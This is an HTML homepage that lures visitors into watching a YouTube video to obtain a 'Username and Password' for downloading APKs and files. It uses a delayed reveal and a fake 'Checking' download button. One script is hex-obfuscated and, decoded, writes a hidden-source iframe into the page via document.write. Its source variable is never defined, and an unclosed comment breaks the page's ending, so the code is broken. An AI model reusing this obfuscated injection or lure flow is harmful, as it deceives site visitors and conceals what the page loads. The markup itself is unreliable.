<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <title>Home</title>
</head>
<body>
    <header>
        <h1>Welcome to Our Website</h1>
        <nav>
            <ul>
                <li><a href="index.html">Home</a></li>
                <li><a href="about.html">About</a></li>
                <li><a href="contact.html">Contact</a></li>
                <li><a href="login.html">Login</a></li>
            </ul>
        </nav>
    </header>
    <section>
        <h2>Home Page Content</h2>
        <p>This is our website, so you can access it or you can download your apk,files,image,etc. Just go to the Login Form and enter the Username and Password. This is difficult to do; so look for my Username and Password first in my video. </p>
         <div class="buttons" style="border-radius: 6px; font-size: 15px; text-align: center;">
          <a class="fa fa-youtube-play" href="#" id="btn_yt" onclick="show()" onmouseout="this.style.background='red'" onmouseover="this.style.background='#e30202'" style="background: red; border-radius: 6px; color: white; display: inline-block; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">&nbsp;Watch the full Video User&Pass...</a>
   <div style="margin: auto;"> 
          <a href="login.html" id="yt" onmouseout="this.style.background='red'" onmouseover="this.style.background='#135B0A'" style="background-color: red; border-radius: 6px; color: white; display: none; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">Go to Link...</a> 
          <a class="fa fa-download" href="#" id="ytv" style="background-color: red; border-radius: 6px; color: white; display: none; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">&nbsp;Checking-->...</a>
     </div>
        </div>
        </section>
<script type="text/javascript">
        var _0x28f9 = ["\x3C\x68\x32\x20\x61\x6C\x69\x67\x6E\x3D\x22\x63\x65\x6E\x74\x65\x72\x22\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22", "\x2F\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x68\x31\x3E", "\x77\x72\x69\x74\x65"]; document[_0x28f9[2]](_0x28f9[0] + src1 + _0x28f9[1])
    </script>
<script type="text/javascript">
        document.getElementById("yt").style.display = "none";
        document.getElementById("ytv").style.display = "none";
        function show() {
            window.open('https://youtu.be/biChMDK0P54');
            // sleep(3000);
            setTimeout(function () {
                document.getElementById("yt").style.display = "block";
                document.getElementById("btn_yt").style.display = "none";
                document.getElementById("ytv").style.display = "none";
            }, 10000);
            //alert();
            document.getElementById("btn_yt").style.display = "none";
            document.getElementById("ytv").style.display = "block";
        }
        
    </script>
<!--End You
    <script src="script.js"></script>
</body>
</html>



